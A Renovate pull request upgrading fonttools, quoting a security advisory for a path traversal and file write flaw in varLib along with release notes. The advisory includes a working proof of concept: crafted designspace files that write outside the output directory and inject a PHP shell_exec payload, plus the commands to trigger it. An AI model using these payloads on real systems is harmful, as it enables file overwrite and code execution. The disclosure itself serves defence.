chore(deps): update dependency fonttools to v4.60.2 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
fonttools	==4.44.0 → ==4.60.2

GitHub Vulnerability Alerts

CVE-2025-66034

Summary

The fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main().

The vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting /etc/passwd).

Overall this allows attackers to:

• Write font files to arbitrary locations on the filesystem
• Overwrite configuration files
• Corrupt application files and dependencies
• Obtain remote code execution

The attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means.

Affected Lines

fontTools/varLib/__init__.py

filename = vf.filename # Unsanitised filename
output_path = os.path.join(output_dir, filename) # Path traversal
vf.save(output_path) # Arbitrary file write

PoC

1. Set up malicious.designspace and respective source-*.ttf files in a directory like /Users/<username>/testing/demo/ (will impact relative file location within malicious.designspace)

setup.py

#!/usr/bin/env python3
import os

from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen

def create_source_font(filename, weight=400):
    fb = FontBuilder(unitsPerEm=1000, isTTF=True)
    fb.setupGlyphOrder([".notdef"])
    fb.setupCharacterMap({})
    
    pen = TTGlyphPen(None)
    pen.moveTo((0, 0))
    pen.lineTo((500, 0))
    pen.lineTo((500, 500))
    pen.lineTo((0, 500))
    pen.closePath()
    
    fb.setupGlyf({".notdef": pen.glyph()})
    fb.setupHorizontalMetrics({".notdef": (500, 0)})
    fb.setupHorizontalHeader(ascent=800, descent=-200)
    fb.setupOS2(usWeightClass=weight)
    fb.setupPost()
    fb.setupNameTable({"familyName": "Test", "styleName": f"Weight{weight}"})
    fb.save(filename)

if __name__ == '__main__':
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    create_source_font("source-light.ttf", weight=100)
    create_source_font("source-regular.ttf", weight=400)

malicious.designspace

<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
  <axes>
    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
  </axes>
  
  <sources>
    <source filename="source-light.ttf" name="Light">
      <location>
        <dimension name="Weight" xvalue="100"/>
      </location>
    </source>
    <source filename="source-regular.ttf" name="Regular">
      <location>
        <dimension name="Weight" xvalue="400"/>
      </location>
    </source>
  </sources>
  
  <!-- Filename can be arbitrarily set to any path on the filesystem -->
  <variable-fonts>
    <variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json">
      <axis-subsets>
        <axis-subset name="Weight"/>
      </axis-subsets>
    </variable-font>
  </variable-fonts>
</designspace>

Optional: You can put a file with any material within ../../tmp/newarbitraryfile.json in advance, the contents in the file will be overwritten after running the setup script in the following step.

2. Run the setup.py script to generate source-*.tff files required for the malicious.designspace file.

python3 setup.py

3. Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename

fonttools varLib malicious.designspace

4. Validate arbitrary file write was performed by looking at path assigned within malicious designspace

cat 

5. After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload.

malicious2.designspace

<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
	<axes>
        <!-- XML injection occurs in labelname elements with CDATA sections -->
	    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400">
	        <labelname xml:lang="en"><![CDATA[<?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]]]><![CDATA[>]]></labelname>
	        <labelname xml:lang="fr">MEOW2</labelname>
	    </axis>
	</axes>
	<axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
	<sources>
		<source filename="source-light.ttf" name="Light">
			<location>
				<dimension name="Weight" xvalue="100"/>
			</location>
		</source>
		<source filename="source-regular.ttf" name="Regular">
			<location>
				<dimension name="Weight" xvalue="400"/>
			</location>
		</source>
	</sources>
	<variable-fonts>
		<variable-font name="MyFont" filename="output.ttf">
			<axis-subsets>
				<axis-subset name="Weight"/>
			</axis-subsets>
		</variable-font>
	</variable-fonts>
	<instances>
		<instance name="Display Thin" familyname="MyFont" stylename="Thin">
			<location><dimension name="Weight" xvalue="100"/></location>
			<labelname xml:lang="en">Display Thin</labelname>
		</instance>
	</instances>
</designspace>

6. When the program is run, we can show we control the contents in the new file

fonttools varLib malicious2.designspace -o file123

Here being outputted to a localised area ignoring filename presented in variable-font

7. We can look inside file123 to validate user controlled injection

cat file123

to show <?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]>

8. Executing the file and reading looking at the newly generated file

php file123
ls -la /tmp/MEOW123

we can see that the file was just created showing RCE.

Recommendations

• Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system

---

Release Notes

fonttools/fonttools (fonttools)

v4.60.2

Compare Source

• Backport release Same as 4.61.0 but without "Drop support for EOL Python 3.9" change to allow downstream projects still on Python 3.9 to avail of the security fix for CVE-2025-66034 (#​3994, #​3999).

v4.60.1

Compare Source

• [ufoLib] Reverted accidental method name change in UFOReader.getKerningGroupConversionRenameMaps
  that broke compatibility with downstream projects like defcon (#​3948, #​3947, robotools/defcon#478).
• [ufoLib] Added test coverage for getKerningGroupConversionRenameMaps method (#​3950).
• [subset] Don't try to subset BASE table; pass it through by default instead (#​3949).
• [subset] Remove empty BaseRecord entries in MarkBasePos lookups (#​3897, #​3892).
• [subset] Add pruning for MarkLigPos and MarkMarkPos lookups (#​3946).
• [subset] Remove duplicate features when subsetting (#​3945).
• [Docs] Added documentation for the visitor module (#​3944).

v4.60.0

Compare Source

• [pointPen] Allow reverseFlipped parameter of DecomposingPointPen to take a ReverseFlipped enum value to control whether/how to reverse contour direction of flipped components, in addition to the existing True/False. This allows to set ReverseFlipped.ON_CURVE_FIRST to ensure that the decomposed outline starts with an on-curve point before being reversed, for better consistency with other segment-oriented contour transformations. The change is backward compatible, and the default behavior hasn't changed (#​3934).

• [filterPen] Added ContourFilterPointPen, base pen for buffered contour operations, and OnCurveStartPointPen filter to ensure contours start with an on-curve point (#​3934).

• [cu2qu] Fixed difference in cython vs pure-python complex division by real number (#​3930).

• [varLib.avar] Refactored and added some new sub-modules and scripts (#​3926).

  • varLib.avar.build module to build avar (and a missing fvar) binaries into a possibly empty TTFont,
  • varLib.avar.unbuild module to print a .designspace snippet that would generate the same avar binary,
  • varLib.avar.map module to take TTFont and do the mapping, in user/normalized space,
  • varLib.avar.plan module moved from varLib.avarPlanner.

  The bare fonttools varLib.avar script is deprecated, in favour of fonttools varLib.avar.build (or unbuild).

• [interpolatable] Clarify linear_sum_assignment backend options and minimal dependency usage (#​3927).

• [post] Speed up build_psNameMapping (#​3923).

• [ufoLib] Added typing annotations to fontTools.ufoLib (#​3875).

v4.59.2

Compare Source

• [varLib] Clear USE_MY_METRICS component flags when inconsistent across masters (#​3912).
• [varLib.instancer] Avoid negative advance width/height values when instatiating HVAR/VVAR, (unlikely in well-behaved fonts) (#​3918).
• [subset] Fix shaping behaviour when pruning empty mark sets (#​3915, harfbuzz/harfbuzz#5499).
• [cu2qu] Fixed dot() product of perpendicular vectors not always returning exactly 0.0 in all Python implementations (#​3911)
• [varLib.instancer] Implemented fully-instantiating avar2 fonts (#​3909).
• [feaLib] Allow float values in VariableScalar's axis locations (#​3906, #​3907).
• [cu2qu] Handle special case in calc_intersect for degenerate cubic curves where 3 to 4 control points are equal (#​3904).

v4.59.1

Compare Source

• [featureVars] Update OS/2.usMaxContext if possible after addFeatureVariationsRaw (#​3894).
• [vhmtx] raise TTLibError('not enough data...') when hmtx/vmtx are truncated (#​3843, #​3901).
• [feaLib] Combine duplicate features that have the same set of lookups regardless of the order in which those lookups are added to the feature (#​3895).
• [varLib] Deprecate varLib.mutator in favor of varLib.instancer. The latter provides equivalent full (static font) instancing in addition to partial VF instancing.
  CLI users should replace fonttools varLib.mutator with fonttools varLib.instancer. API users should migrate to fontTools.varLib.instancer.instantiateVariableFont (#​2680).

v4.59.0

Compare Source

• Removed hard-dependency on pyfilesystem2 (fs package) from fonttools[ufo] extra. This is replaced by the fontTools.misc.filesystem package, a stdlib-only, drop-in replacement for the subset of the pyfilesystem2's API used by fontTools.ufoLib. The latter should continue to work with the upstream fs (we even test with/without). However, clients who wish to continue using fs can do so by depending on it directly instead of via the fonttools[ufo] extra (#​3885, #​3620).
• [xmlWriter] Replace illegal XML characters (e.g. control or non-characters) with "?" when dumping to ttx (#​3868, #​71).
• [varLib.hvar] Fixed vertical metrics fields copy/pasta error (#​3884).
• Micro optimizations in ttLib and sstruct modules (#​3878, #​3879).
• [unicodedata] Add Garay script to RTL_SCRIPTS (#​3882).
• [roundingPen] Remove unreliable kwarg usage. Argument names aren’t consistent among point pens’ .addComponent() implementations, in particular baseGlyphName vs glyphName (#​3880).

v4.58.5

Compare Source

• [feaLib] Don't try to combine ligature & multisub rules (#​3874).
• [feaLib/ast] Use weakref proxies to avoid cycles in visitor (#​3873).
• [varLib.instancer] Fixed instancing CFF2 fonts where VarData contains more than 64k items (#​3858).

v4.58.4

Compare Source

• [feaLib] Fixed iterable check for Python 3.13.4 and newer (#​3854, #​3855).

v4.58.3

Compare Source

• [feaLib] Fixed iterable check for Python 3.13.4 and newer (#​3854, #​3855).

v4.58.2

Compare Source

• [ttLib.reorderGlyphs] Handle CFF2 when reordering glyphs (#​3852)
• [subset] Copy name IDs in use before scrapping or scrambling them for webfonts (#​3853)

v4.58.1

Compare Source

• [varLib] Make sure that fvar named instances only reuse name ID 2 or 17 if they are at the default location across all axes, to match OT spec requirement (#​3831).
• [feaLib] Improve single substitution promotion to multiple/ligature substitutions, fixing a few bugs as well (#​3849).
• [loggingTools] Make Timer._time a static method that doesn't take self, makes it easier to override (#​3836).
• [featureVars] Use None for empty ConditionSet, which translates to a null offset in the compiled table (#​3850).
• [feaLib] Raise an error on conflicting ligature substitution rules instead of silently taking the last one (#​3835).
• Add typing annotations to T2CharStringPen (#​3837).
• [feaLib] Add single substitutions that were promoted to multiple or ligature substitutions to aalt feature (#​3847).
• [featureVars] Create a default LangSys in a ScriptRecord if missing when adding feature variations to existing GSUB later in the build (#​3838).
• [symfont] Added a main().
• [cffLib.specializer] Fix rmoveto merging when blends used (#​3839, #​3840).
• [pyftmerge] Add support for cmap format 14 in the merge tool (#​3830).
• [varLib.instancer/cff2] Fix vsindex of Private dicts when instantiating (#​3828, #​3232).
• Update text file read to use UTF-8 with optional BOM so it works with e.g. Windows Notepad.exe (#​3824).
• [varLib] Ensure that instances only reuse name ID 2 or 17 if they are at the default location across all axes (#​3831).
• [varLib] Create a dflt LangSys in a ScriptRecord when adding variations later, to fix an avoidable crash in an edge case (#​3838).

v4.58.0

Compare Source

• Drop Python 3.8, require 3.9+ (#​3819)
• [HVAR, VVAR] Prune unused regions when using a direct mapping (#​3797)
• [Docs] Improvements to ufoLib documentation (#​3721)
• [Docs] Improvements to varLib documentation (#​3727)
• [Docs] Improvements to Pens and pen-module documentation (#​3724)
• [Docs] Miscellany updates to docs (misc modules and smaller modules) (#​3730)
• [subset] Close codepoints over BiDi mirror variants. (#​3801)
• [feaLib] Fix serializing ChainContextPosStatement and ChainContextSubstStatement in some rare cases (#​3788)
• [designspaceLib] Clarify user expectations for getStatNames (#​2892)
• [GVAR] Add support for new GVAR table (#​3728)
• [TSI0, TSI5] Derive number of entries to decompile from data length (#​2477)
• [ttLib] Fix AttributeError when reporting table overflow (#​3808)
• [ttLib] Apply rounding more often in getCoordinates (#​3798)
• [ttLib] Ignore component bounds if empty (#​3799)
• [ttLib] Change the separator for duplicate glyph names from "#" to "." (#​3809)
• [feaLib] Support subtable breaks in CursivePos, MarkBasePos, MarkToLigPos and MarkToMarkPos lookups (#​3800, #​3807)
• [feaLib] If the same lookup has single substitutions and ligature substitutions, upgrade single substitutions to ligature substitutions with one input glyph (#​3805)
• [feaLib] Correctly handle <NULL> in single pos lookups (#​3803)
• [feaLib] Remove duplicates from class pair pos classes instead of raising an error (#​3804)
• [feaLib] Support creating extension lookups using useExtenion lookup flag
  instead of silently ignoring it (#​3811)
• [STAT] Add typing for the simpler STAT arguments (#​3812)
• [otlLib.builder] Add future import for annotations (#​3814)
• [cffLib] Fix reading supplement encoding (#​3813)
• [voltLib] Add some missing functionality and fixes to voltLib and VoltToFea, making the conversion to feature files more robust. Add also fonttools voltLib command line tool to compile VOLT sources directly (doing an intermediate fea conversion internally) (#​3818)
• [pens] Add some PointPen annotations (#​3820)

v4.57.0

Compare Source

• [ttLib.__main__] Add --no-recalc-timestamp flag (#​3771)
• [ttLib.__main__] Add -b (recalcBBoxes=False) flag (#​3772)
• [cmap] Speed up glyphOrder loading from cmap (#​3774)
• [ttLib.__main__] Improvements around the -t flag (#​3776)
• [Debg] Fix parsing from XML; add roundtrip tests (#​3781)
• [fealib] Support *Base.MinMax tables (#​3783, #​3786)
• [config] Add OPTIMIZE_FONT_SPEED (#​3784)
• [varLib.hvar] New module to add HVAR table to the font (#​3780)
• [otlLib.optimize] Fix crash when the provided TTF does not contain a GPOS (#​3794)

v4.56.0

Compare Source

• [varStore] Sort the input todo list with the same sorting key used for the opimizer's output (#​3767).
• [otData] Fix DeviceTable's DeltaValue repeat value which caused a crash after importing from XML and then compiling a GPOS containing Device tables (#​3758).
• [feaLib] Make FeatureLibError pickleable, so client can e.g. use feaLib to can compile features in parallel with multiprocessing (#​3762).
• [varLib/gvar] Removed workaround for old, long-fixed macOS bug about composite glyphs with all zero deltas (#​1381, #​1788).
• [Docs] Updated ttLib documentation, beefed up TTFont and TTGlyphSet explanations (#​3720).

v4.55.8

Compare Source

• [MetaTools] Fixed bug in buildUCD.py script whereby the first non-header line of some UCD text file was being skipped. This affected in particular the U+00B7 (MIDDLE DOT) entry of ScriptExtensions.txt (#​3756).

v4.55.7

Compare Source

• Shorten the changelog included in PyPI package description to accommodate maximum length limit imposed by Azure DevOps. No actual code changes since v4.55.6 (#​3754).

v4.55.6

Compare Source

• [glyf] Fixed regression introduced in 4.55.5 when computing bounds of nested composite glyphs with transformed components (#​3752).

v4.55.5

Compare Source

• [glyf] Fixed recalcBounds of transformed components with unrounded coordinates (#​3750).
• [feaLib] Allow duplicate script/language statements (#​3749).

v4.55.4

Compare Source

• [bezierTools] Fixed splitCubicAtT sometimes not returning identical start/end points as result of numerical precision (#​3742, #​3743).
• [feaLib/ast] Fixed docstring of AlternateSubstStatement (#​3735).
• [transform] Typing fixes (#​3734).

v4.55.3

Compare Source

• [Docs] fill out ttLib table section [#​3716]
• [feaLib] More efficient inline format 4 lookups [#​3726]

v4.55.2

Compare Source

• [Docs] update Sphinx config (#​3712)
• [designspaceLib] Allow axisOrdering to be set to zero (#​3715)
• [feaLib] Don’t modify variable anchors in place (#​3717)

v4.55.1

Compare Source

• [ttGlyphSet] Support VARC CFF2 fonts (#​3683)
• [DecomposedTransform] Document and implement always skewY == 0 (#​3697)
• [varLib] "Fix" cython iup issue? (#​3704)
• Cython minor refactor (#​3705)

v4.55.0

Compare Source

• [cffLib.specializer] Adjust stack use calculation (#​3689)
• [varLib] Lets not add mac names if the rest of name doesn't have them (#​3688)
• [ttLib.reorderGlyphs] Update CFF table charstrings and charset (#​3682)
• [cffLib.specializer] Add cmdline to specialize a CFF2 font (#​3675, #​3679)
• [CFF2] Lift uint16 VariationStore.length limitation (#​3674)
• [subset] consider variation selectors subsetting cmap14 (#​3672)
• [varLib.interpolatable] Support CFF2 fonts (#​3670)
• Set isfinal to true in XML parser for proper resource cleanup (#​3669)
• [removeOverlaps] Fix CFF CharString width (#​3659)
• [glyf] Add optimizeSize option (#​3657)
• Python 3.13 support (#​3656)
• [TupleVariation] Optimize for loading speed, not size (#​3650, #​3653)

v4.54.1

Compare Source

• [unicodedata] Update to Unicode 16
• [subset] Escape \ in doc string

v4.54.0

Compare Source

• [Docs] Small docs cleanups by @​n8willis (#​3611)
• [Docs] cleanup code blocks by @​n8willis (#​3627)
• [Docs] fix Sphinx builds by @​n8willis (#​3625)
• [merge] Minor fixes to documentation for merge by @​drj11 (#​3588)
• [subset] Small tweaks to pyftsubset documentation by @​RoelN (#​3633)
• [Tests] Do not require fonttools command to be available by @​behdad (#​3612)
• [Tests] subset_test: add failing test to reproduce issue #​3616 by @​anthrotype (#​3622)
• [ttLib] NameRecordVisitor: include whole sequence of character variants' UI labels, not just the first by @​anthrotype (#​3617)
• [varLib.avar] Reconstruct mappings from binary by @​behdad (#​3598)
• [varLib.instancer] Fix visual artefacts with partial L2 instancing by @​Hoolean (#​3635)
• [varLib.interpolatable] Support discrete axes in .designspace by @​behdad (#​3599)
• [varLib.models] By default, assume OpenType-like normalized space by @​behdad (#​3601)

v4.53.1

Compare Source

4.53.1

• [feaLib] Improve the sharing of inline chained lookups (#​3559)
• [otlLib] Correct the calculation of OS/2.usMaxContext with reversed chaining contextual single substitutions (#​3569)
• [misc.visitor] Visitors search the inheritance chain of objects they are visiting (#​3581)

v4.53.0

Compare Source

• [ttLib.removeOverlaps] Support CFF table to aid in downconverting CFF2 fonts (#​3528)
• [avar] Fix crash when accessing not-yet-existing attribute (#​3550)
• [docs] Add buildMathTable to otlLib.builder documentation (#​3540)
• [feaLib] Allow UTF-8 with BOM when reading features (#​3495)
• [SVGPathPen] Revert rounding coordinates to two decimal places by default (#​3543)
• [varLib.instancer] Refix output filename decision-making (#​3545, #​3544, #​3548)

v4.52.4

Compare Source

• [varLib.cff] Restore and deprecate convertCFFtoCFF2 that was removed in 4.52.0 release as it is used by downstream projects (#​3535).

v4.52.3

Compare Source

Fixed a small syntax error in the reStructuredText-formatted NEWS.rst file which caused the upload to PyPI to fail for 4.52.2. No other code changes.

v4.52.1

Compare Source

Fixed a small syntax error in the reStructuredText-formatted NEWS.rst file which caused the upload to PyPI to fail for 4.52.0.
No other code changes.

v4.51.0

Compare Source

• [ttLib] Optimization on loading aux fields (#​3464).
• [ttFont] Add reorderGlyphs (#​3468).

v4.50.0

Compare Source

• [pens] Added decomposing filter pens that draw components as regular contours (#​3460).
• [instancer] Drop explicit no-op axes from TupleVariations (#​3457).
• [cu2qu/ufo] Return set of modified glyph names from fonts_to_quadratic (#​3456).

v4.49.0

Compare Source

• [otlLib] Add API for building MATH table (#​3446)

v4.48.1

Compare Source

• Fixed uploading wheels to PyPI, no code changes since v4.48.0.

v4.47.2

Compare Source

Minor release to fix uploading wheels to PyPI.

v4.47.0

Compare Source

• [varLib.models] New API for VariationModel: getMasterScalars and interpolateFromValuesAndScalars.
• [varLib.interpolatable] Various bugfixes and rendering improvements. In particular, add a Summary page in the front, and an Index and Table-of-Contents in the back. Change the page size to Letter.
• [Docs/designspaceLib] Defined a new public.fontInfo lib key, not used anywhere yet (#​3358).

v4.46.0

Compare Source

• [featureVars] Allow to register the same set of substitution rules to multiple features. The addFeatureVariations function can now take a list of featureTags; similarly, the lib key 'com.github.fonttools.varLib.featureVarsFeatureTag' can now take a comma-separateed string of feature tags (e.g. "salt,ss01") instead of a single tag (#​3360).
• [featureVars] Don't overwrite GSUB FeatureVariations, but append new records to it for features which are not already there. But raise VarLibError if the feature tag already has feature variations associated with it (#​3363).
• [varLib] Added addGSUBFeatureVariations function to add GSUB Feature Variations to an existing variable font from rules defined in a DesignSpace document (#​3362).
• [varLib.interpolatable] Various bugfixes and rendering improvements. In particular, a new test for "underweight" glyphs. The new test reports quite a few false-positives though. Please send feedback.

v4.45.1

Compare Source

• [varLib.interpolatable] Various bugfixes and improvements, better reporting, reduced false positives.
• [ttGlyphSet] Added option to not recalculate glyf bounds (#​3348).

v4.45.0

Compare Source

• [varLib.interpolator] Vastly improved algorithms. Also available now is --pdf and --html options to generate a PDF or HTML report of the interpolation issues.
  The PDF/HTML report showcases the problematic masters, the interpolated broken glyph, as well as the proposed fixed version.

v4.44.3

Compare Source

• [subset] Only prune codepage ranges for OS/2.version >= 1, ignore otherwise (#​3334).
• [instancer] Ensure hhea vertical metrics stay in sync with OS/2 ones after instancing MVAR table containing 'hasc', 'hdsc' or 'hlgp' tags (#​3297).

v4.44.1

Compare Source

• [feaLib] Ensure variable mark anchors are deep-copied while building since they get modified in-place and later reused (#​3330).
• [OS/2|subset] Added method to recalcCodePageRanges to OS/2 table class; added --prune-codepage-ranges to fonttools subset command (#​3328, #​2607).

NOTE: this release was "yanked" from PyPI because it introduced a regression: #​3334

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[coveralls]

Pull Request Test Coverage Report for Build 20090478725

Details

• 0 of 0 changed or added relevant lines in 0 files are covered.
• No unchanged relevant lines lost coverage.
• Overall coverage remained the same at 45.841%

---

Totals
Change from base Build 11621102184:	0.0%
Covered Lines:	237
Relevant Lines:	517

---

💛 - Coveralls